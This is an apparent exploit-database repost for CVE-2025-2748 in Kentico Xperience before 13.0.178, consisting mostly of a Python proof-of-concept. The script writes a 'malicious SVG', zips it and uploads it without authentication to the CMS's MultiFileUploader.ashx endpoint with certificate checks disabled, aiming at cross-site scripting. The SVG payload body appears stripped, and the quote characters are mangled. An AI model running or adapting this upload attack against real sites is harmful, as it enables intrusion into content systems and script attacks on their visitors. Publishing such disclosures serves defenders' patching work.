Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)

May 13, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)
Exploit ID EDB-ID:52290
Type exploitdb
Published 2025-05-13T00:00:00
Modified 2025-05-13T00:00:00

CVSS Information

CVSS Score 9.8
Severity CRITICAL
Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2025-2748
  • CVE-2025-32370

Exploit Description

Exploit Title: Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)…

Exploit Code

# Exploit Title: Kentico Xperience 13.0.178 – Cross Site Scripting (XSS)

# Date: 2025-05-09

# Version: Kentico Xperience before 13.0.178

# Exploit Author: Alex Messham

# Contact: [email protected]

# Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178—XSS-POC/

# CVE: CVE-2025-32370

import requests

import subprocess

import os

import argparse

def create_svg_payload(svg_filename: str):

print(f”[*] Writing malicious SVG to: {svg_filename}”)

svg_payload = ”’

“http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd”>

xmlns=”http://www.w3.org/2000/svg”>



”’

with open(svg_filename, ‘w’) as f:

f.write(svg_payload)

def zip_payload(svg_filename: str, zip_filename: str):

print(f”[*] Creating zip archive: {zip_filename}”)

subprocess.run([‘zip’, zip_filename, svg_filename], check=True)

def upload_zip(zip_filename: str, target_url: str):

full_url = f”{target_url}?Filename={zip_filename}&Complete=false”

headers = {

“Content-Type”: “application/octet-stream”

}

print(f”[+] Uploading {zip_filename} to {full_url}”)

with open(zip_filename, ‘rb’) as f:

response = requests.post(full_url, headers=headers, data=f,

verify=False)

if response.status_code == 200:

print(“[+] Upload succeeded”)

else:

print(f”[-] Upload failed with status code {response.status_code}”)

print(response.text)

if __name__ == “__main__”:

parser = argparse.ArgumentParser(description=”PoC for CVE-2025-2748 –

Unauthenticated ZIP file upload with embedded SVG for XSS.”)

parser.add_argument(“–url”, required=True, help=”Target upload URL

(e.g. https://example.com/CMSModules/…/MultiFileUploader.ashx)”)

parser.add_argument(“–svg”, default=”poc.svc”, help=”SVG filename to

embed inside the zip”)

parser.add_argument(“–zip”, default=”exploit.zip”, help=”Name of the

output zip file”)

args = parser.parse_args()

create_svg_payload(args.svg)

zip_payload(args.svg, args.zip)

upload_zip(args.zip, args.url)

“`

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.